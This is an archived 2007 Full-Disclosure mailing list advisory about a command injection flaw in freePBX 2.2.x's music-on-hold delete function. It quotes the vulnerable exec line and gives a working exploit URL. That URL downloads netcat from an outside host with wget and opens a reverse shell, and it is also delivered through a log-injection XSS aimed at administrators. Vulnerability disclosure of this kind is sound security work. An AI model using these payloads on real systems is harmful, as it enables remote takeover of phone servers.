Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] freePBX 2.2.x's Music-on-hold Remote Code Execution In

from [XenoMuta] Network Security [Permanent Link]
Subject: [Full-disclosure] freePBX 2.2.x's Music-on-hold Remote Code Execution Injection
Date: Sat, 21 Apr 2007 17:33:34 -0400
I've found a code injection in the music-on-hold module at freePBX's portal.

There are Inssuficient filters in the delete functions. Only " ' and ; are being filtered.

Vulnerable Lines:
300: $rmcmd="rm -f \"".$path_to_dir."/". $del."\"";
301: exec($rmcmd);


Example code:
http://<freePBX-host>/admin/config.php?display=music&del=\`wget -q http://xenomuta.coolinc.info/nc -O /tmp/nc\`\`/tmp/nc myhost.mydomain.com 1234 -e /bin/sh\`&category=default


You can inject this code without access to the portal into the /var/ log/asterisk/full this way...
./asteriskxss.php asterisk-server "<img src=\"/admin/config.php? display=music&del=\`wget -q http://xenomuta.coolinc.info/nc -O /tmp/nc \`\`/tmp/nc myhost.mydomain.com 1234 -e /bin/sh\`&category=default\">"
hoping that an administrator to view the logs from the portals.... using the documented XSS vulnerability posted here...

http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/ 053882.html


Attachment: smime.p7s
Description: S/MIME cryptographic signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] freePBX 2.2.x's Music-on-hold Remote Code Execution Injection, XenoMuta <=
Previous by Date:  [Full-disclosure] Apparently eEye's blog got p0wnd, Paul Schmehl
Next by Date:  Re: [Full-disclosure] [Amsn-devel] aMSN <= 0.96 remote DoS vulnerability, Youness Alaoui
Previous by Thread:  [Full-disclosure] Apparently eEye's blog got p0wnd, Paul Schmehl
Next by Thread:  Re: [Full-disclosure] [Amsn-devel] aMSN <= 0.96 remote DoS vulnerability, Youness Alaoui
Indexes:  [Date] [Thread] [Top] [All Lists]